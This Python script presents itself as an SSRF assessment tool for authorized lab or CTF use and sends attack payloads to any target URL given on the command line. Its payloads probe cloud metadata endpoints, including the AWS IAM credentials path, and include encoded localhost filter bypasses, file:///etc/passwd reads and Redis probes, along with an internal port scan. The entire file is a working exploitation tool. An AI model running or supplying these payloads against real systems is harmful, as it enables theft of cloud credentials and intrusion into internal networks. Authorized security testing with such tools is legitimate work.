#!/usr/bin/env python3 # For authorized testing in lab/CTF environments only """SSRF vulnerability detection agent with cloud metadata and filter bypass testing.""" import argparse import json import logging import sys from typing import List try: import requests except ImportError: sys.exit("requests is required: pip install requests") logging.basicConfig(level=logging.INFO, format="%(asctime)s [%(levelname)s] %(message)s") logger = logging.getLogger(__name__) CLOUD_METADATA = { "aws_imdsv1": "http://169.254.169.254/latest/meta-data/", "aws_iam": "http://169.254.169.254/latest/meta-data/iam/security-credentials/", "gcp": "http://metadata.google.internal/computeMetadata/v1/", "azure": "http://169.254.169.254/metadata/instance?api-version=2021-02-01", "digitalocean": "http://169.254.169.254/metadata/v1/", } LOCALHOST_BYPASSES = [ "http://127.0.0.1/", "http://0177.0.0.1/", "http://0x7f.0.0.1/", "http://2130706433/", "http://127.1/", "http://0/", "http://[::1]/", "http://0.0.0.0/", "http://127.0.0.1.nip.io/", ] PROTOCOL_PAYLOADS = [ "file:///etc/passwd", "file:///c:/windows/win.ini", "dict://127.0.0.1:6379/info", ] def test_ssrf_endpoint(target_url: str, param_name: str, payload_url: str, method: str = "POST", auth_header: str = "") -> dict: """Send an SSRF payload to a target endpoint and analyze the response.""" headers = {"Content-Type": "application/json"} if auth_header: headers["Authorization"] = auth_header data = {param_name: payload_url} try: if method.upper() == "POST": resp = requests.post(target_url, json=data, headers=headers, timeout=10, verify=False) else: resp = requests.get(target_url, params=data, headers=headers, timeout=10, verify=False) return { "payload": payload_url, "status_code": resp.status_code, "content_length": len(resp.content), "response_preview": resp.text[:200], "success_indicators": _check_success(resp.text, payload_url), } except requests.RequestException as exc: return {"payload": payload_url, "error": str(exc)} def _check_success(response_text: str, payload: str) -> List[str]: """Check response for indicators of successful SSRF.""" indicators = [] checks = { "aws_metadata": ["ami-id", "instance-id", "security-credentials", "iam"], "gcp_metadata": ["computeMetadata", "project-id", "service-accounts"], "azure_metadata": ["vmId", "subscriptionId", "resourceGroupName"], "local_file": ["root:", "/bin/bash", "[extensions]", "for 16-bit"], "internal_service": ["redis_version", "elasticsearch", "Jenkins"], } for name, keywords in checks.items(): if any(kw.lower() in response_text.lower() for kw in keywords): indicators.append(name) return indicators def test_cloud_metadata(target_url: str, param_name: str, auth_header: str = "") -> List[dict]: """Test SSRF against all cloud metadata endpoints.""" results = [] for provider, meta_url in CLOUD_METADATA.items(): result = test_ssrf_endpoint(target_url, param_name, meta_url, auth_header=auth_header) result["cloud_provider"] = provider results.append(result) if result.get("success_indicators"): logger.warning("SSRF to %s: indicators=%s", provider, result["success_indicators"]) return results def test_localhost_bypasses(target_url: str, param_name: str, auth_header: str = "") -> List[dict]: """Test localhost SSRF filter bypasses.""" results = [] for bypass in LOCALHOST_BYPASSES: result = test_ssrf_endpoint(target_url, param_name, bypass, auth_header=auth_header) result["bypass_type"] = "localhost_encoding" results.append(result) return results def test_protocol_schemes(target_url: str, param_name: str, auth_header: str = "") -> List[dict]: """Test non-HTTP protocol schemes (file://, dict://, gopher://).""" results = [] for payload in PROTOCOL_PAYLOADS: result = test_ssrf_endpoint(target_url, param_name, payload, auth_header=auth_header) result["protocol"] = payload.split(":")[0] results.append(result) return results def scan_internal_ports(target_url: str, param_name: str, internal_ip: str, ports: List[int], auth_header: str = "") -> List[dict]: """Scan internal ports via SSRF to discover services.""" results = [] for port in ports: payload = f"http://{internal_ip}:{port}/" result = test_ssrf_endpoint(target_url, param_name, payload, auth_header=auth_header) result["internal_ip"] = internal_ip result["port"] = port is_open = (result.get("status_code") == 200 and result.get("content_length", 0) > 0 and not result.get("error")) result["port_likely_open"] = is_open results.append(result) return results def run_assessment(target_url: str, param_name: str, auth_header: str = "") -> dict: """Run complete SSRF assessment.""" cloud = test_cloud_metadata(target_url, param_name, auth_header) bypasses = test_localhost_bypasses(target_url, param_name, auth_header) protocols = test_protocol_schemes(target_url, param_name, auth_header) ports = scan_internal_ports(target_url, param_name, "127.0.0.1", [22, 80, 443, 3306, 5432, 6379, 8080, 9200], auth_header) findings = [] cloud_hits = [c for c in cloud if c.get("success_indicators")] if cloud_hits: findings.append(f"CRITICAL: Cloud metadata accessible via {len(cloud_hits)} endpoints") bypass_hits = [b for b in bypasses if b.get("status_code") == 200 and b.get("content_length", 0) > 50] if bypass_hits: findings.append(f"HIGH: {len(bypass_hits)} localhost filter bypass(es) successful") protocol_hits = [p for p in protocols if p.get("success_indicators")] if protocol_hits: findings.append(f"HIGH: Non-HTTP protocols accepted ({', '.join(p['protocol'] for p in protocol_hits)})") return { "target": target_url, "parameter": param_name, "cloud_metadata_tests": cloud, "localhost_bypasses": bypasses, "protocol_tests": protocols, "internal_port_scan": ports, "findings": findings, } def main(): parser = argparse.ArgumentParser(description="SSRF Vulnerability Assessment Agent") parser.add_argument("--url", required=True, help="Target URL with SSRF-prone endpoint") parser.add_argument("--param", default="url", help="Parameter name accepting URLs") parser.add_argument("--auth", default="", help="Authorization header value") parser.add_argument("--output", default="ssrf_report.json") args = parser.parse_args() report = run_assessment(args.url, args.param, args.auth) with open(args.output, "w") as f: json.dump(report, f, indent=2) logger.info("Report saved to %s", args.output) print(json.dumps(report, indent=2)) if __name__ == "__main__": main()